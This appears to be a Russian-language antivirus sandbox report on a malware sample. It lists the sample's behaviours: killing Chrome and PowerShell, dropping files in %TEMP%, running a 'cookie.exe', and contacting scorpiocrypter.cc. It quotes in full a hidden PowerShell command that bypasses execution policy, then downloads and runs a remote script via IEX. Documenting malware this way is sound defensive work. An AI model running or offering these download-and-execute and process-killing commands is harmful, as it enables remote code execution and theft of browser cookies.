Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://scorpiocrypter.cc/halka.ps1
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /F /IM powershell.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM chrome.exe /T
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\util_helper.exe
- %TEMP%\log_zqvayzvoe_user.txt
Сетевая активность
Подключается к
- 'sc####ocrypter.cc':443
TCP
Другие
- 'sc####ocrypter.cc':443
UDP
- DNS ASK sc####ocrypter.cc
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Запускает на исполнение
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name like '%chrome%'" delete (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Get-Process chrome* | Stop-Process -Force" (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cd /d "%TEMP%\" && cookie.exe (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://scorpiocrypter.cc/halka.ps1')" (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM powershell.exe (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM chrome.exe /T (со скрытым окном)
